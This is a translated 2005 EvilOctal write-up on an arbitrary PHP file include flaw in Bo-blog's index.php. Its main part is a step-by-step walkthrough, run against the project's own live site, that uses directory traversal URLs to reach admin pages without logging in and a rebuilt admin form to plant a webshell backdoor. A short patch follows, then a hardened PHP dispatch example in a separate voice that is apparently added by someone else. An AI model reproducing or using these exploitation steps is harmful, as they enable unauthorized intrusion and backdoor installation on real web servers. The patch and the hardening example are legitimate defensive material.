Bo-blog index.php arbitrary PHP file include vulnerability

Author: I am not myself [F.s.t]
Source: EvilOctal Information Security Team (www.eviloctal.com)

Note: This article was first published on the Firefox Technology Alliance (www.wrsky.com) and was submitted to the EvilOctal Information Security Team by a Firefox member.

This is a vulnerability I found during a penetration test. An official patch has since been released.
Vulnerability discovery date: 2005.6.13
Vulnerable versions: Bo-blog <= 1.7.0108 (before patching)
Vulnerability analysis and exploitation:
I have just found a fatal Bo-blog vulnerability. The version I looked at is 1.7.0095, but the vulnerability presumably exists in the latest version as well. The job variable in index.php is not filtered, so it can be used to include any PHP file.
index.php
-------------------- Cute split line -----------------------------
[Codz begin]
33  if (empty($job)) $job = "listall";
34  if ($job == "main") $job = "listall";

178 if (!file_exists("include/$job.php")) $job = "listall";   // no filtering: only checks that include/$job.php exists
179 include("include/$job.php");                              // then includes whatever $job points to
[Codz end]
-------------------- Cute split line -----------------------------
Through this $job variable we can include any file with a .php extension, as long as it exists on the server (../ can be used to traverse directories). In fact the same problem exists in admin_cp.php, but calling admin_cp.php requires admin privileges, so only index.php is usable.

Now let's start testing. www.bo-blog.com is the author's main site; let's have a look at its PHP settings. Enter: http://www.bo-blog.com/index.php?job=../admin/change&action=phpinfo
The action parameter is passed to admin/change.php, which displays phpinfo. Don't worry about it not being callable: index.php includes global.php, which defines inwork, so change.php can be used without logging in.
Some basic information is obtained: the server is Windows NT 5.2 build 3790 running PHP5, with safe_mode = on.
Next, get a webshell from it. http://www.bo-blog.com/index.php?job=../admin/ban is the admin backend page originally used to ban IP addresses, words and so on. It is not filtered either, so we can write a shell directly. We have to build the form ourselves, though: first look at the original file, and use the bansearch (forbidden search words) feature that the site hasn't used.
-------------------- Cute split line -----------------------------
[Codz begin]
<table cellpadding=0 cellspacing=0 align=center width='000000' bgcolor='#000000'>
<tr><td>
<table cellpadding=5 cellspacing=1 width='000000'><form action=admin_cp.php?job=ban method=post>
<tr bgcolor='#e9f2fc'><td colspan=2><font color="#000000">Banned words. Separate each word with a half-width comma</font></td></tr>
<tr bgcolor='#ffff'><td width=20%>Sensitive words:</td><td><textarea name="sensitive" rows=15 cols=80></textarea></td></tr><input type=hidden name=action value=savesensitive>
<tr bgcolor='#ffff'><td colspan=2>Enter forbidden words, case insensitive</td></tr>
<tr bgcolor='#ffff'><td colspan=2 align=center><input type=submit value=Submit> <input type='reset' value=Reset>
</td></tr></form>
</table>
</td></tr>
</table>
[Codz end]
-------------------- Cute split line -----------------------------
Save this as an HTML file. Note: the form's action must be changed from action=admin_cp.php?job=ban to action=http://www.bo-blog.com/blog/index.php?job=../admin/ban. Save and open this HTML file.
In the textarea of the form, write Lanker's mini backdoor and click Submit. (Note that it must not contain special characters such as ' " or /, because PHP automatically adds backslashes to them.)
The system responds:
-------------------- Cute split line -----------------------------
Updated
The forbidden search words have been saved.
-------------------- Cute split line -----------------------------
Success, heh heh.
Come on, let's try connecting with the client of Lanker's backdoor. See our cute shell? Yes, that means it worked ~~

Simple vulnerability fix:

Before line 178, `if (!file_exists("include/$job.php")) $job = "listall";`, add the following code:
$job = str_replace(".", "", $job);
$job = str_replace("/", "", $job);
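The str_replace fix above strips "." and "/", but on the Windows host described earlier "\" is also a directory separator, and stripping characters still lets unexpected names through. As an added example (not Bo-blog's code and not the author's patch; the include directory and the job names are assumptions), here is a stricter dispatch for the same $job lookup: a plain-identifier check, an allowlist, and a realpath containment check.

```php
<?php
// Added example: stricter replacement for the $job dispatch in index.php.
// Not Bo-blog's code; INCLUDE_DIR and the job names below are assumptions.

define('INCLUDE_DIR', __DIR__ . '/include');

// Jobs the front-end may dispatch to (assumed names; in a real deployment
// enumerate the files that actually live in include/).
$allowed_jobs = array('listall', 'showblog', 'showcat', 'search');

function resolve_job($job, array $allowed)
{
    // Default and alias handling, as in the original lines 33-34.
    if (empty($job) || $job === 'main') {
        $job = 'listall';
    }
    // 1. Only a plain identifier is accepted. One regex rejects '.', '/',
    //    '\\' (the Windows separator the str_replace fix misses) and NUL.
    if (!preg_match('/^[a-z0-9_]+$/', $job)) {
        return 'listall';
    }
    // 2. Allowlist: unknown names fall back to the default page instead of
    //    being probed with file_exists().
    if (!in_array($job, $allowed, true)) {
        return 'listall';
    }
    // 3. Belt and braces: the resolved path must stay inside include/.
    $base = realpath(INCLUDE_DIR);
    $path = realpath(INCLUDE_DIR . '/' . $job . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return 'listall';
    }
    return $job;
}

// Read the parameter explicitly rather than relying on register_globals,
// which is how the original $job was populated.
$job = isset($_GET['job']) ? (string) $_GET['job'] : '';
$job = resolve_job($job, $allowed_jobs);
include INCLUDE_DIR . '/' . $job . '.php';
```

With this in place, job=../admin/change and job=..\admin\ban both fail the identifier check and land on listall, and a valid name can only ever include a file that is both allowlisted and physically under include/.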

Video of the test against the official Bo-Blog site:
http://www.wofeiwo.info/boblog.rar
